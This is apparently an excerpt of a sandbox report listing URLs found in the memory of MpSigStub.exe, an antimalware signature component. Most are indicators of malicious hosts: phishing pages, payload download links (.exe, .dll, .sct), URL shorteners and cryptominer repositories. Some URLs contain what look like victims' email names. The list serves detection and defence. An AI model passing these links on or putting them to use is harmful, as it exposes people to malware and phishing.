Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/m6q5dhmjpfxes94/ps2.txt
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/u/611200196/scan637.pdf.htm
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://docs-eight-sable.vercel.app/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc?id=1hajtdasfuta6vew8d5gjkd_bhnd3pwmc
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://docs.healthmade.org//tc.js
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1fxj2_ITnq1Yb6QbXw3HncRuwFAB8wN47&export=download
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: https://drp.su/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://dumpitnow2138.com/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://dumpster-server.herokuapp.com/manager/query
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://dvsolutionsar.com/code/post.php
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://dynafivecon.com/ds/26.gif
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://e3g564rtdfg.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://easb.edu.sg/templates/system/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://ecombox.store/tbl_add.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://eetownvulgar.xyz/3/ssf.dll
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://efishedo.info/?tag_id
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://elisegiordano.com/bwvsc2f5zwrac2hhcmtlewfzdwdhci5jb20=
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://emvoips.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://en.czonediver.com/ds/0502.gif
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://esp.adnan.dev.hostingshouse.com/ds/151120.gif
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://esscorp.org/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://etprimewomenawards.com/apply2/uploads/w_a/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://excavationtrick.com/dir/
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://exploshot.com/24.gif
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://f.coka.la/6wzxbj.sct
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://faxzmessageservice.club
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://fazadminmessae.info
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/gr-nte-rgwea-fbg-nh-yt.appspot.com/o/dbvfuery%2fw-euy-f8
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/jv-i4t-78gy-9h.appspot.com/o/bg-i547-gt9%2f84-75tr-g87.h
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/project-2141562284063338550.appspot.com/o/57-8574-54%2fg
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/project-6870194580473866225.appspot.com/o/f-grg45-t%2f24
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/relaxdaysun.appspot.com/o/g%20ct%206%20yg-u%2ff%20cr%20y
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://frabey.de/templates/elsterwetter16b/images/system/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n4.sendspace.com/dlpro/20fb7f511bc258709195b9ca0c6c258e/595e5d75/k6zafp/x6iu1omg_2_.zips
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n5.sendspace.com/dl/23da2e4841c1800d1954130c638d13c3/575d2f1645706e13/ooru9w/google%20ch
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://gabejesus.net/admin/model/design/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://gantiatiainzx.us-south.cf.appdomain.cloud/?bbre=zxoiasxz#/abrimvh-&
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://gaspee.info/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://gatipackers-movers.com/wp-content/plugins/(
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://get.adobe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://gfdefrgthyujjyhtbgrvfcdxs.s3.us-east-2.amazonaws.com/afghtyujytgrfdegt.html
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://gfoundries.ru/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://gg.gg/ig6f0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://ggtraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://gidbasket.com/drms/ind.html
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/68070804
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/JulianG97/TextEditor
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Programmist6996
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/georgw777/
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/georgw777/MediaManager
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nwoolls/multiminer
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/5gdfwn
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/t4wd4iscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/yuzvvg
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://goodbyegraffitiseattle.com/jhjdhjd/files/index.php)
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://grabify.link/ibac74
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://grace-memorial-church.com/shares/share/fghjke77383oned/share
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/doc/reserva.wiz
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/natalidade/new.wiz
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://h9-mil.live/?e=anita.masyk
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://handrug.com.py/baterfly/aleacarte.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://hard10.authorizeddns.us/1?zved58il3scrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://hardx2.mydad.info/1?ef8il3hesscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: https://hastebin.com/raw/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://holidayinndarlingharbour-my.sharepoint.com/personal/dos_holidayinndarlingharbour_com_au/_lay
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://humana.service-now.com/arp
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://hvaclinic.com/redirect/amvhbi1mcmfuy29pcy52yxnzzxvyqgjlzmvzys5jb20=
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://i.gyazo.com/7fc7a0126fd7e7c8bcb89fc52967c8ec.png
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://i.imgur.com/c1skhwk.png
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://ia601404.us.archive.org/7/items/bypass_98778/bypass_98778.txt
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://iffusedtrac.xyz/3/bbc.exe
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://ikkon.pk/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://immobiliareneri.casa/drms/ind.html
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://indygrace.com/sun/scan-img-rcsh-253018.exe
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://ines-arnshoff.de/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://inetaccelerator.ru/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://integratedcombatcentre.com.au/wp-content/uploads/tmp/outlook365/outlook365/index.php
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/fnchq3
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/p1cyuo
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://jadr223.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://jaypalsinh.ngsoftweb.eEvvmU%in/OLD_07032021/classeEvvmU%es/PHPExcel/Calculation/Token/pm4Cb7
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://jbrealestategroups.com/wp-content/themes/bridge/extendvc/msg.
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://jcenter.bintray.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://jdjuwuryh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
